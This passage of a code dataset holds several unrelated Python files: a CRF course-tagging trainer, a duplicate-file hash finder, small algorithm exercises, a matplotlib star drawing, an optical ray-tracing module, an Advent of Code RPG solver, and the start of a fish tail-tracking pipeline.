isdot(next_token),\n '+2:token_tag=%s' % next_token_tag,\n '+2:token_tag[:2]=%s' % next_token_tag[:2]\n ]) \n if i > 1:\n next_token = doc[i-2][0]\n next_token_tag = doc[i-2][1]\n features.extend([\n '-2:token.lower=' + next_token.lower(),\n '-2:token.length=' + str(len(next_token)),\n '-2:token.isupper=%s' % next_token.isupper(),\n '-2:token.istitle=%s' % 
next_token.istitle(),\n '-2:token.isdigit=%s' % next_token.isdigit(),\n '-2:token.isdot=%s' % isdot(next_token),\n '-2:token_tag=%s' % next_token_tag,\n '-2:token_tag[:2]=%s' % next_token_tag[:2]\n ])\n return features\n\n\ndef isdot(word):\n return True if '.' in word else False\n\n\ndef extract_label(course):\n return [tup[2] for tup in course]\n #return [doc[2]]\n\nif __name__ == '__main__':\n nlp = spacy.load(\"en\")\n #x pos y\n data_train = []\n data_test = []\n\n with open(\"train-ashford-tag.txt\", \"r\") as train_f:\n for line in train_f: #line = course description\n course = []\n for sentence in re.split(r'<[^>]+>', line):\n if not sentence.isspace():\n try:\n tags = re.findall(r'<[^>]+>', sentence)\n #print(tags[0])\n sentence = re.sub(tags[0],'',sentence.strip())\n #print(sentence)\n for w in nlp(sentence):\n course.append((w.text, w.tag_, tags[0]))\n except:\n continue\n data_train.append(course)\n \n\n X_train = [[create_feature(course, i) for i in range(len(course))] for course in data_train]\n Y_train = [extract_label(course) for course in data_train]\n # [extract_label(tuple_list) for tuple_list in data_train]\n\n\n trainer = pycrfsuite.Trainer(verbose=False)\n\n for xseq, yseq in zip(X_train, Y_train):\n trainer.append(xseq, yseq)\n\n trainer.set_params({\n 'c1': 0.1,\n 'c2': 0.01,\n 'max_iterations': 10\n #'feature.possible_transitions': True\n })\n\n trainer.train('ashford.model')\n","repo_name":"ichenY/cousrse-advisor","sub_path":"Ashford/Ashford/train_ashford.py","file_name":"train_ashford.py","file_ext":"py","file_size_in_byte":4460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8902986087","text":"import os\nfrom sys import argv, getsizeof\nfrom time import time\nfrom hashlib import sha256\n\n\ndef process(directory):\n children = os.listdir(directory)\n for child in children:\n childpath = directory + \"\\\\%s\" % child\n if os.path.isdir(childpath):\n print(\"Processing directory %s\" % childpath)\n process(childpath)\n elif os.path.isfile(childpath):\n logdetails(childpath)\n\n\ndef logdetails(filepath):\n if not os.path.isfile(filepath):\n print(\"Asked to log details of something not a file, returning.\")\n print(\"Path: %s\" % filepath)\n return False\n filename = os.path.basename(filepath)\n filehash = hashfile(filepath)\n filesize = os.path.getsize(filepath)\n _files[filepath] = (filename, filehash, filesize)\n if filehash in _hashes.keys():\n _hashes[filehash].append(filepath)\n else:\n _hashes[filehash] = [filepath]\n\n\ndef hashfile(path):\n buffer_size = 65536\n shasha = sha256()\n with open(path, 'rb') as filetohash:\n while True:\n data = filetohash.read(buffer_size)\n if not data:\n break\n shasha.update(data)\n return shasha.hexdigest()\n\n\ndef distilhashes(hashes):\n newhashes = {}\n for hashvalue in hashes.keys():\n if len(hashes[hashvalue]) > 1:\n newhashes[hashvalue] = hashes[hashvalue]\n return newhashes\n\n\ndef reducetounit(number, exponent=0):\n if number < 1024:\n return \"{:,.3g}\".format(number) + \" \" + getbytesunit(exponent)\n else:\n return reducetounit(number / 1024, exponent + 1)\n\n\ndef getbytesunit(exponent):\n return {\n 0: 'bytes',\n 1: 'kB',\n 2: 'MB',\n 3: 'GB',\n 4: 'TB',\n 5: 'PB',\n }.get(exponent, False)\n\n\nif len(argv) > 1:\n _rootpath = argv[1]\nelse:\n _rootpath = os.getcwd()\n# _rootpath = os.getcwd() + '\\\\sample'\nif not os.path.exists(_rootpath):\n print(\"Provided path does not exist.\")\n exit(1)\nif not os.path.isdir(_rootpath):\n print(\"Provided 
path not a directory.\")\n exit(1)\n\n_timestart = time()\nprint(\"Processing path %s\" % _rootpath)\n\n_files = {}\n_hashes = {}\nprocess(_rootpath)\n_timeend = time()\n_timetaken = _timeend - _timestart\n\n\nprint(\"Files processed:\")\nfor _filepath in _files.keys():\n _filename, _filehash, _filesize = _files[_filepath]\n print(\" %s: \\n %s\\n %s\\n %d\" % (_filepath, _filename, _filehash, _filesize))\n\n_duplicates = distilhashes(_hashes)\n_totalduplicatespace = 0\nif len(_duplicates) > 0:\n print(\"\\n\\nDuplicates found:\")\n for _duplicate in _duplicates.keys():\n print(\"\\n Duplicate hash: %s\" % _duplicate)\n _filesize = 0\n for _duplicatepath in _duplicates[_duplicate]:\n _filesize = os.path.getsize(_duplicatepath)\n print(\" %s\" % _duplicatepath)\n _duplicatespace = _filesize * (len(_duplicates[_duplicate]) - 1)\n print(\" Space wasted: %s \" % reducetounit(_duplicatespace))\n _totalduplicatespace += _duplicatespace\nelse:\n print(\"\\n\\nNO DUPLICATES FOUND\")\n\nprint(\"\\nRun statistics:\")\nprint(\" Time taken: {0:.2f} seconds\".format(_timetaken))\nprint(\" File count: {:,}\".format(len(_files)))\nprint(\" File list in memory: %s\" % reducetounit(getsizeof(_files)))\nprint(\" Duplicate hashes found: {:,}\".format(len(_duplicates)))\nprint(\" Duplicate hashes list in memory: %s\" % reducetounit(getsizeof(_duplicates)))\nprint(\" Space wasted by duplicates: %s\" % reducetounit(_totalduplicatespace))\n","repo_name":"cloudbear/dupy","sub_path":"du.py","file_name":"du.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3608692179","text":"# Given an array, rotate the array to the right by k steps, where k is non-negative.\n\n# Follow up:\n\n# Try to come up as many solutions as you can, there are at least 3 different ways to solve this problem.\n# Could you do it in-place with O(1) extra space?\n \n\n# Example 1:\n\n# Input: nums = [1,2,3,4,5,6,7], k = 3\n# Output: [5,6,7,1,2,3,4]\n# Explanation:\n# rotate 1 steps to the right: [7,1,2,3,4,5,6]\n# rotate 2 steps to the right: [6,7,1,2,3,4,5]\n# rotate 3 steps to the right: [5,6,7,1,2,3,4]\n\ndef rotate(nums, k):\n new_nums = []\n for i in range(len(nums)-k, len(nums)):\n new_nums.append(nums[i])\n for j in range(len(nums)-k):\n new_nums.append(nums[j])\n for p in range(len(nums)):\n nums[p] = new_nums[p]\n print(nums)\n\nnums = [1,2,3,4,5,6,7]\nk = 2\nrotate(nums, k)\n\n \n\n","repo_name":"Maxwell2016LeChouchou/coding","sub_path":"leetcode/python/rotateArray_189.py","file_name":"rotateArray_189.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"236551307","text":"'''Lowest Common Ancestor\nGiven the root and two nodes in a Binary Tree. 
Find the lowest common ancestor(LCA) of the two nodes.\n\nThe lowest common ancestor is the node with the largest depth which is the ancestor of both nodes.\n\n Notice\n\nAssume the two nodes exist in the tree.\nExample\nFor the following binary tree:\n\n 4\n / \\\n3 7\n / \\\n 5 6\nLCA(3, 5) = 4\n\nLCA(5, 6) = 7\n\nLCA(6, 7) = 7\n'''\n\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\nclass Solution:\n \"\"\"\n @param {TreeNode} root The root of the binary tree.\n @param {TreeNode} A and {TreeNode} B two nodes\n @return Return the LCA of the two nodes.\n \"\"\"\n def lowestCommonAncestor(self, root, A, B):\n # write your code here\n if not root or root is A or root is B:\n return root\n left = self.lowestCommonAncestor(root.left, A, B)\n right = self.lowestCommonAncestor(root.right, A, B)\n if left and right:\n return root\n if left:\n return left\n if right:\n return right\n return None\n \n","repo_name":"daniellaah/Data-Structure-and-Algorithms","sub_path":"lintcode/code/088_Lowest_Common_Ancestor.py","file_name":"088_Lowest_Common_Ancestor.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"10936305887","text":"person = list()\np = list()\nc = heaviest = lightest = hp = lp = 0\n# hp = Heavier Person // lp = Lighter Person\nwhile True:\n p.append(str(input('Insert a name: ')).strip().capitalize())\n p.append(float(input('The weight of the person: ')))\n person.append(p[:])\n p.clear()\n if c == 0:\n heaviest = lightest = person[0][1]\n hp, lp = [person[0][0]], [person[0][0]]\n else:\n if heaviest < person[c][1]:\n heaviest = person[c][1]\n hp = [person[c][0]]\n elif lightest > person[c][1]:\n lightest = person[c][1]\n lp = [person[c][0]]\n elif heaviest == person[c][1]:\n heaviest = person[c][1]\n hp += [person[c][0]]\n elif lightest == person[c][1]:\n lightest = person[c][1]\n lp += [person[c][0]]\n c += 1\n cont = str(input('Do you want to continue? 
[y/n]: ')).strip().lower()[0]\n if cont == 'n':\n break\nprint(f'The quantity of people registered: {len(person)}')\nprint(f'The Heaviest people: {hp} with {heaviest}kg.')\nprint(f'The lightest people: {lp} with {lightest}kg.')\n","repo_name":"PatrickAMenezes/PyExercises-CeV","sub_path":"Mundo3/PyExercises - CeV - Mundo 3/Exercises (00 - 34)/ex 12.py","file_name":"ex 12.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"72041883610","text":"from matplotlib import patches\nfrom math import pi, sqrt\nfrom matplotlib.path import Path\nimport matplotlib.pyplot as plt\n\ndef pentagon(radius, orientation):\n return patches.RegularPolygon((0,0), numVertices=5, radius=radius, orientation=orientation, linestyle='-', fill=None)\n\ndef get_pentagon_vertices(pentagon):\n return [(x[0], x[1]) for x in pentagon.get_verts()]\n\nfig = plt.figure(figsize=(10,10))\nax = plt.gca()\nouter_radius = 10.0\ninner_radius = 2.0/(3.0+sqrt(5.0))*outer_radius + 2\nax.set_aspect(1)\nax.set_xlim(-outer_radius, outer_radius)\nax.set_ylim(-outer_radius, outer_radius)\nouter_pentagon = pentagon(outer_radius, 0)\nouter_points = get_pentagon_vertices(outer_pentagon)\n#ax.add_artist(outer_pentagon)\ninner_pentagon = pentagon(inner_radius, pi/5.0)\ninner_points = get_pentagon_vertices(inner_pentagon)\n#ax.add_artist(inner_pentagon)\nax.set_axis_off()\n\nstar_points = []\nfor idx in range(len(outer_points)):\n star_points.append(outer_points[idx])\n star_points.append(inner_points[idx])\n\ncodes = [Path.MOVETO] + [Path.LINETO]*(len(star_points)-2) + [Path.CLOSEPOLY]\nstar = Path(star_points, codes)\npatch = patches.PathPatch(star, facecolor='orange', lw=2)\nax.add_patch(patch)\nplt.show()\n\n","repo_name":"EvelineV/ppviz","sub_path":"pentagram.py","file_name":"pentagram.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19911555541","text":"\nimport numpy as np\nimport math\nfrom .SurfTools import surface_tools as SUT\n\nclass InterNormalCalc():\n \"\"\"InterNormalCalc.\n \"\"\"\n\n def __init__(self, SurfData, TypTot, PR3D, HS):\n \"\"\"__init__.\n\n Parameters\n ----------\n SurfData :\n SurfData\n TypTot :\n TypTot\n PR3D :\n PR3D\n HS :\n HS\n \"\"\"\n self.HS = HS\n self.SDT = SurfData\n self.n = len(self.SDT)\n self.SuTo = SUT(SurfData)\n self.Pr3D = PR3D\n self.Disable_Inner = 1\n self.ExtraDiameter = 0\n self.AAA = self.Pr3D.AAA\n self.BBB = self.Pr3D.BBB\n self.DDD = self.Pr3D.DDD\n self.EEE = self.Pr3D.EEE\n self.GlassOnSide = self.Pr3D.GlassOnSide\n self.side_number = self.Pr3D.side_number\n self.TypeTotal = self.Pr3D.TypeTotal\n self.TRANS_1A = self.Pr3D.TRANS_1A\n self.TRANS_2A = self.Pr3D.TRANS_2A\n self.Pn = np.asarray([0.0, 0.0, 0.0])\n\n self.P1 = np.asarray([0.0, 0.0, 0.0, 1.0])\n self.P2 = np.asarray([0.0, 0.0, 0.0, 1.0])\n self.P_z1 = 10000000.0\n\n def __SigmaHitTransfSpace(self, PP_start, PP_stop, j):\n \"\"\"__SigmaHitTransfSpace.\n\n Parameters\n ----------\n PP_start :\n PP_start\n PP_stop :\n PP_stop\n j :\n j\n \"\"\"\n\n StopPoint = np.array([PP_stop[0], PP_stop[1], PP_stop[2], 1.0])\n StarPoint = np.array([PP_start[0], PP_start[1], PP_start[2], 1.0])\n\n SurfHit = 1\n P_SurfHit = self.Pr3D.TRANS_1A[j].dot(StopPoint)\n Px1 = P_SurfHit[(0, 0)]\n Py1 = P_SurfHit[(0, 1)]\n Pz1 = P_SurfHit[(0, 2)]\n\n P_start = self.Pr3D.TRANS_1A[j].dot(StarPoint)\n P_x1 = P_start[(0, 0)]\n P_y1 = P_start[(0, 1)]\n 
P_z1 = P_start[(0, 2)]\n\n P12 = [(Px1 - P_x1), (Py1 - P_y1), (Pz1 - P_z1)]\n [L, M, N] = (P12 / np.linalg.norm(P12))\n\n Px1 = (((L / N) * (- P_z1)) + P_x1)\n Py1 = (((M / N) * (- P_z1)) + P_y1)\n\n Pz1 = 0\n SurfHit = 1\n\n P_x2 = 0\n P_y2 = 0\n P_z2 = 0\n\n if (len(np.shape(P_x1)) != 0):\n L = L[0]\n M = M[0]\n N = N[0]\n P_x1 = P_x1[0]\n P_y1 = P_y1[0]\n P_z1 = P_z1[0]\n Px1 = Px1[0]\n Py1 = Py1[0]\n Pz1 = Pz1[0]\n P_x2 = P_x2[0]\n P_y2 = P_y2[0]\n P_z2 = P_z2[0]\n SurfHit = SurfHit[0]\n\n if (self.SDT[j].Thin_Lens == 0):\n self.vj = j\n\n ASD=np.sqrt(((Px1-self.SDT[j].SubAperture[2])**2) + ((Py1-self.SDT[j].SubAperture[1])**2))\n D0 = (2.0 * ASD)\n DiamInf = ((self.SDT[j].InDiameter * self.SDT[j].SubAperture[0]) * self.Disable_Inner)\n DiamSup = ((self.SDT[j].Diameter * self.SDT[j].SubAperture[0]) + (10000.0 * self.ExtraDiameter))\n\n\n if ((D0 > DiamSup) or (D0 < DiamInf)):\n SurfHit = 0\n P_x2 = 0\n P_y2 = 0\n P_z2 = 0\n else:\n (P_x2, P_y2, P_z2) = self.HS.SolveHit(Px1, Py1, Pz1, L, M, N, j)\n if (not math.isnan(P_z2)):\n P_x2 = self.HS.vevaX\n P_y2 = self.HS.vevaY\n\n ASD=np.sqrt(((Px1-self.SDT[j].SubAperture[2])**2) + ((Py1-self.SDT[j].SubAperture[1])**2))\n D0 = (2.0 * ASD)\n\n DiamInf = ((self.SDT[j].InDiameter * self.SDT[j].SubAperture[0]) * self.Disable_Inner)\n DiamSup = ((self.SDT[j].Diameter * self.SDT[j].SubAperture[0]) + (10000.0 * self.ExtraDiameter))\n if ((D0 > DiamSup) or (D0 < DiamInf)):\n SurfHit = 0\n else:\n SurfHit = 0\n P_x2 = 0\n P_y2 = 0\n P_z2 = 0\n else:\n ASD=np.sqrt(((Px1 - self.SDT[j].SubAperture[2])**2) + ((Py1 - self.SDT[j].SubAperture[1])**2))\n D0 = (2.0 * ASD)*0.999999\n\n if ((D0 > self.SDT[j].Diameter * self.SDT[j].SubAperture[0]) or (D0 < self.SDT[j].InDiameter * self.SDT[j].SubAperture[0] )):\n SurfHit = 0\n P_x2 = 0\n P_y2 = 0\n P_z2 = 0\n\n else:\n P_x2 = ((L / N) * self.SDT[j].Thin_Lens)\n P_y2 = ((M / N) * self.SDT[j].Thin_Lens)\n P_z2 = self.SDT[j].Thin_Lens\n\n return (SurfHit, P_x2, P_y2, P_z2, Px1, Py1, Pz1, L, M, N)\n\n def __SigmaHitTransfSpaceFast(self, PP_start, PP_stop, j):\n\n StopPoint = np.array([PP_stop[0], PP_stop[1], PP_stop[2], 1.0])\n StarPoint = np.array([PP_start[0], PP_start[1], PP_start[2], 1.0])\n\n SurfHit = 1\n P_SurfHit = self.Pr3D.TRANS_1A[j].dot(StopPoint)\n Px1 = P_SurfHit[(0, 0)]\n Py1 = P_SurfHit[(0, 1)]\n Pz1 = P_SurfHit[(0, 2)]\n\n P_start = self.Pr3D.TRANS_1A[j].dot(StarPoint)\n P_x1 = P_start[(0, 0)]\n P_y1 = P_start[(0, 1)]\n P_z1 = P_start[(0, 2)]\n\n P12 = [(Px1 - P_x1), (Py1 - P_y1), (Pz1 - P_z1)]\n [L, M, N] = (P12 / np.linalg.norm(P12))\n\n Px1 = (((L / N) * (- P_z1)) + P_x1)\n Py1 = (((M / N) * (- P_z1)) + P_y1)\n\n Pz1 = 0\n SurfHit = 1\n\n P_x2 = 0\n P_y2 = 0\n P_z2 = 0\n\n\n (P_x2, P_y2, P_z2) = self.HS.SolveHit(Px1, Py1, Pz1, L, M, N, j)\n if (not math.isnan(P_z2)):\n P_x2 = self.HS.vevaX\n P_y2 = self.HS.vevaY\n\n else:\n SurfHit = 0\n P_x2 = 0\n P_y2 = 0\n P_z2 = 0\n\n return (SurfHit, P_x2, P_y2, P_z2, Px1, Py1, Pz1)\n\n def __ParaxCalcObjOut2OrigSpace(self, Px2, Py2, Pz2, Px1, Py1, Pz1, j):\n \"\"\"__ParaxCalcObjOut2OrigSpace.\n\n Parameters\n ----------\n Px2 :\n Px2\n Py2 :\n Py2\n Pz2 :\n Pz2\n Px1 :\n Px1\n Py1 :\n Py1\n Pz1 :\n Pz1\n j :\n j\n \"\"\"\n P1 = [Px1, Py1, Pz1, 1]\n P2 = [Px2, Py2, Pz2, 1]\n NP1 = self.TRANS_2A[j].dot(P1)\n NP2 = self.TRANS_2A[j].dot(P2)\n Pn = np.asarray([(- (NP1[(0, 0)] - NP2[(0, 0)])), (- (NP1[(0, 1)] - NP2[(0, 1)])), (- (NP1[(0, 2)] - NP2[(0, 2)]))])\n norm = (Pn / np.linalg.norm(Pn))\n PTO_exit = [NP1[(0, 0)], NP1[(0, 1)], NP1[(0, 2)]]\n 
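# also keep the exit point expressed in the untransformed object space\n 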
PTO_exit_Object_Space = [Px1, Py1, Pz1]\n return (norm, PTO_exit, PTO_exit_Object_Space)\n\n def __SigmaOutOrigSpace(self, P_x2, P_y2, P_z2, j):\n \"\"\"__SigmaOutOrigSpace.\n\n Parameters\n ----------\n P_x2 :\n P_x2\n P_y2 :\n P_y2\n P_z2 :\n P_z2\n j :\n j\n \"\"\"\n (New_L, New_M, New_N) = self.HS.SurfDer(P_x2, P_y2, P_z2)\n\n Pz1z2 = (self.P_z1 - P_z2)\n\n P_x1 = ((Pz1z2 * (New_L / New_N)) + P_x2)\n P_y1 = ((Pz1z2 * (New_M / New_N)) + P_y2)\n\n\n self.P1[0], self.P1[1], self.P1[2] = P_x1, P_y1, self.P_z1\n self.P2[0], self.P2[1], self.P2[2] = P_x2, P_y2, P_z2\n\n NP1 = self.TRANS_2A[j].dot(self.P1)\n NP2 = self.TRANS_2A[j].dot(self.P2)\n\n\n self.Pn[0] = - (NP1[(0, 0)] - NP2[(0, 0)])\n self.Pn[1] = - (NP1[(0, 1)] - NP2[(0, 1)])\n self.Pn[2] = - (NP1[(0, 2)] - NP2[(0, 2)])\n\n\n LNOR=np.sqrt((self.Pn[0]**2.)+(self.Pn[1]**2.)+(self.Pn[2]**2.))\n\n norm = (self.Pn / LNOR)\n\n PTO_exit = [NP2[(0, 0)], NP2[(0, 1)], NP2[(0, 2)]]\n PTO_exit_Object_Space = [P_x2, P_y2, P_z2]\n\n\n return (norm, PTO_exit, PTO_exit_Object_Space)\n\n def __HitOnMask(self, PP_start, PP_stop, j):\n \"\"\"__HitOnMask.\n\n Parameters\n ----------\n PP_start :\n PP_start\n PP_stop :\n PP_stop\n j :\n j\n \"\"\"\n SurfHit = 1\n HITS_CONT = []\n if (self.SDT[j].Mask_Type != 0):\n OBJECT = self.DDD[j]\n for obj in OBJECT:\n (inter_mask, ind_mask) = obj.ray_trace(PP_start, PP_stop)\n Hit_MASK = np.shape(inter_mask)[0]\n HITS_CONT.append(Hit_MASK)\n HITS_CONT = np.asarray(HITS_CONT)\n if np.any((HITS_CONT == 1)):\n SurfHit_MASK = 1\n else:\n SurfHit_MASK = 0\n if (self.SDT[j].Mask_Type == 1):\n if (SurfHit_MASK == 1):\n SurfHit = 1\n else:\n SurfHit = 0\n if (self.SDT[j].Mask_Type == 2):\n if (SurfHit_MASK == 1):\n SurfHit = 0\n else:\n SurfHit = 1\n return SurfHit\n\n def __GrooveDirectionVector(self, j):\n \"\"\"__GrooveDirectionVector.\n\n Parameters\n ----------\n j :\n j\n \"\"\"\n self.P1[0], self.P1[1], self.P1[2] = 0, 0, 0\n self.P2[0], self.P2[1], self.P2[2] = -np.cos(np.deg2rad(self.SDT[j].Grating_Angle)), -np.sin(np.deg2rad(self.SDT[j].Grating_Angle)),0\n\n NP1 = self.TRANS_2A[j].dot(self.P1)\n NP2 = self.TRANS_2A[j].dot(self.P2)\n\n self.Pn[0] = - (NP1[(0, 0)] - NP2[(0, 0)])\n self.Pn[1] = - (NP1[(0, 1)] - NP2[(0, 1)])\n self.Pn[2] = - (NP1[(0, 2)] - NP2[(0, 2)])\n\n LNOR=np.sqrt((self.Pn[0]**2.)+(self.Pn[1]**2.)+(self.Pn[2]**2.))\n\n Pg_v = (self.Pn / LNOR)\n return Pg_v\n\n def InterNormal(self, PP_start, PP_stop, j, jj):\n \"\"\"InterNormal.\n\n Parameters\n ----------\n PP_start :\n PP_start\n PP_stop :\n PP_stop\n j :\n j\n jj :\n jj\n \"\"\"\n PTO_exit = [0, 0, 0]\n PTO_exit_Object_Space = [0, 0, 0]\n LMN_exit_Object_Space = [0, 0, 1]\n norm = [0, 0, 1]\n SurfHit = 1\n\n if (self.SDT[j].Diff_Ord == 0):\n Pgn = [0, 1, 0]\n\n else:\n Pgn = self.__GrooveDirectionVector(j)\n\n if (self.TypeTotal[jj] == 0):\n SurfHit = 1\n SurfHit = self.__HitOnMask(PP_start, PP_stop, j)\n\n if (SurfHit != 0):\n\n (SurfHit, Px2, Py2, Pz2, Px1, Py1, Pz1, L, M, N) = self.__SigmaHitTransfSpace(PP_start, PP_stop, j)\n LMN_exit_Object_Space = [L, M, N]\n\n if (self.SDT[j].Thin_Lens == 0):\n (norm, PTO_exit, PTO_exit_Object_Space) = self.__SigmaOutOrigSpace(Px2, Py2, Pz2, j)\n\n else:\n (norm, PTO_exit, PTO_exit_Object_Space) = self.__ParaxCalcObjOut2OrigSpace(Px2, Py2, Pz2, Px1, Py1, Pz1, j)\n else:\n (SurfHit, norm, PTO_exit, Pgn) = self.__InterNormalSolidObject(jj, PP_start, PP_stop)\n return (SurfHit, np.asarray(norm), np.asarray(PTO_exit), np.asarray(Pgn), np.asarray(PTO_exit_Object_Space), np.asarray(LMN_exit_Object_Space), 
j)\n\n    def __InterNormalSolidObject(self, jj, PP_start, PP_stop):\n        \"\"\"__InterNormalSolidObject.\n\n        Parameters\n        ----------\n        jj :\n            jj\n        PP_start :\n            PP_start\n        PP_stop :\n            PP_stop\n        \"\"\"\n        Pgn = np.asarray([0, 1, 0])\n        PTO_exit = [0, 0, 0]\n        norm = [0, 0, 1]\n        (inter, ind) = self.EEE[jj].ray_trace(PP_start, PP_stop)\n        SurfHit = np.shape(inter)[0]\n        if (SurfHit != 0):\n            s = 0\n            h = []\n            for f in ind:\n                PD = (np.asarray(inter[s]) - np.asarray(PP_start))\n                distance = np.linalg.norm(PD)\n                if (np.abs(distance) < 0.05):\n                    distance = 99999999999999.9\n                h.append(distance)\n                s = (s + 1)\n            index = np.argmin(np.asarray(h))\n            PTO_exit = inter[index]\n            NOR = self.EEE[jj].cell_normals\n            norm = NOR[ind[index]]\n            Pgn = np.asarray([0, 0, 1])\n        return (SurfHit, norm, PTO_exit, Pgn)\n","repo_name":"Garchupiter/Kraken-Optical-Simulator","sub_path":"KrakenOS/InterNormalCalc.py","file_name":"InterNormalCalc.py","file_ext":"py","file_size_in_byte":11981,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"32"} +{"seq_id":"42945546802","text":"\"\"\"Day 21: RPG Simulator 20XX\n\nhttps://adventofcode.com/2015/day/21\n\n\"\"\"\nimport re\nfrom dataclasses import dataclass\nfrom itertools import combinations, product\n\n# hit points - always reduced at least 1\n# damage = attacker's damage score - defender's armour score\n# user 0 damage , 0 armour, 100 hit points\n\nSHOP = \"\"\"\nWeapons: Cost Damage Armor\nDagger 8 4 0\nShortsword 10 5 0\nWarhammer 25 6 0\nLongsword 40 7 0\nGreataxe 74 8 0\n\nArmor: Cost Damage Armor\nLeather 13 0 1\nChainmail 31 0 2\nSplintmail 53 0 3\nBandedmail 75 0 4\nPlatemail 102 0 5\n\nRings: Cost Damage Armor\nDamage +1 25 1 0\nDamage +2 50 2 0\nDamage +3 100 3 0\nDefense +1 20 0 1\nDefense +2 40 0 2\nDefense +3 80 0 3\n\"\"\"\n\n\nBOSS = re.compile(r'Hit Points: (\\d+)\\nDamage: (\\d+)\\nArmor: (\\d+)')\nITEM = re.compile(r'\\w+\\s?\\+?\\d?\\s+(\\d+)\\s+(\\d+)\\s+(\\d+)')\n\n\nclass Character:\n\n    def __init__(self, hp, damage, armor):\n        self.hp = hp\n        self.damage = damage\n        self.armor = armor\n\n    def __repr__(self):\n        return f'<Character hp={self.hp} damage={self.damage} armor={self.armor}>'\n\n    def fight(self, opponent):\n        while self.hp > 0 and opponent.hp > 0:\n            opponent.hp -= max(self.damage - opponent.armor, 1)\n            self.hp -= max(opponent.damage - self.armor, 1)\n        return opponent.hp <= 0\n\n\n@dataclass\nclass Item:\n    cost: int\n    damage: int = 0\n    armor: int = 0\n\n    def __add__(self, other):\n        return Item(\n            self.cost + other.cost,\n            self.damage + other.damage,\n            self.armor + other.armor,\n        )\n\n\ndef parse_character(input_str):\n    hp, damage, armor = map(int, list(BOSS.findall(input_str)[0]))\n    return Character(hp, damage, armor)\n\n\ndef _parse_item_list_from_string(item_list_str):\n    return [\n        Item(int(cost), int(damage), int(armor))\n        for cost, damage, armor in ITEM.findall(item_list_str)\n    ]\n\n\ndef parse_shop(input_str):\n    for items_str in input_str.strip().split('\\n\\n'):\n        yield _parse_item_list_from_string(items_str)\n\n\ndef item_combinations(weapons, armors, rings):\n    ring_pairs = combinations(rings, 2)\n    for w, a, rp in product(weapons, armors, ring_pairs):\n        yield w + a + rp[0] + rp[1]\n\n\ndef go_shopping(weapons, armors, rings):\n    empty_item = Item(0, 0, 0)\n    armors.append(empty_item)\n    rings.extend([empty_item, empty_item])\n    return item_combinations(weapons, armors, rings)\n\n\ndef solve(data, shop, price_function=min):\n    return price_function([\n        item.cost\n        for item in go_shopping(*parse_shop(shop))\n        if Character(\n            100, item.damage, item.armor\n        ).fight(parse_character(data)) is (price_function == min)\n    ])\n\n\nif __name__ 
== '__main__':\n input_data = open('input_data.txt').read()\n result = solve(input_data, SHOP, min)\n print(f'Example1: {result}')\n\n result = solve(input_data, SHOP, max)\n print(f'Example2: {result}')\n","repo_name":"lenarother/advent-of-code","sub_path":"adventofcode_2015/day_21/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":3141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40240041645","text":"import numpy as np\nimport pandas as pd\nfrom dataclasses import dataclass,field\nfrom functools import partial\n\nfrom megabouts.pipeline.cfg import ConfigTrajPreprocess,ConfigTailPreprocess,ConfigSparseCoding,ConfigTailSegmentation,ConfigClassification\n\nfrom megabouts.tracking_data.dataset import Dataset_TailTracking\nfrom megabouts.segmentation.segment import Segment\nfrom megabouts.classification.template_bouts import Knn_Training_Dataset\n\nfrom megabouts.preprocessing.preprocessing import preprocess_tail\nfrom megabouts.segmentation.segment import extract_bouts\n\nfrom megabouts.sparse_coding.sparse_coding import compute_sparse_code,SparseCode\nfrom megabouts.segmentation.segment import Segment,segment_from_code,segment_from_code_w_fine_alignement\nfrom megabouts.classification.classify import bouts_classifier,Classification\n\nfrom megabouts.utils.utils_bouts import compute_bout_cat_ts\n\n\n@dataclass\nclass PipelineFreeTailOnly_Result:\n tracking_data: Dataset_TailTracking\n tracking_data_clean: Dataset_TailTracking\n baseline: np.ndarray=field(init=True,repr=False)\n sparse_code: SparseCode\n segments: Segment\n segments_original: Segment\n tail_array: np.ndarray=field(init=True,repr=False)\n classification: Classification\n bout_category_ts: np.ndarray=field(init=True,repr=False)\n bout_category_ts_signed: np.ndarray=field(init=True,repr=False)\n \n\n@dataclass(repr=False)\nclass PipelineFreeTailOnly():\n cfg_tail_preprocess : ConfigTailPreprocess = field(init=True)\n cfg_sparse_coding : ConfigSparseCoding = field(init=True)\n cfg_segment : ConfigTailSegmentation = field(init=True)\n cfg_classify : ConfigClassification = field(init=True)\n knn_training_dataset_augmented: Knn_Training_Dataset = field(init=False)\n load_training: bool = True\n res: PipelineFreeTailOnly_Result = field(init=False)\n\n \n def __post_init__(self):\n assert self.cfg_tail_preprocess.fps==self.cfg_segment.fps==self.cfg_classify.fps, \\\n f\"fps should be the same in both config\"\n if self.load_training:\n self.load_training_template()\n \n def load_training_template(self):\n self.knn_training_dataset_augmented = Knn_Training_Dataset(fps = self.cfg_tail_preprocess.fps,\n augmentation_delays = np.unique(np.arange(self.cfg_classify.augment_min_delay,self.cfg_classify.augment_max_delay,self.cfg_classify.augment_step_delay).tolist()+[0]),\n bouts_dict = self.cfg_classify.bouts_dict,\n bout_duration = self.cfg_classify.bout_duration,\n peak_loc = self.cfg_classify.margin_before_peak)\n def preprocess_tail(self,tail_angle):\n return preprocess_tail(tail_angle=tail_angle,\n limit_na=self.cfg_tail_preprocess.limit_na,\n num_pcs=self.cfg_tail_preprocess.num_pcs,\n baseline_method = self.cfg_tail_preprocess.baseline_method,\n baseline_params = self.cfg_tail_preprocess.baseline_params)\n \n def compute_sparse_code(self,tail_angle):\n return 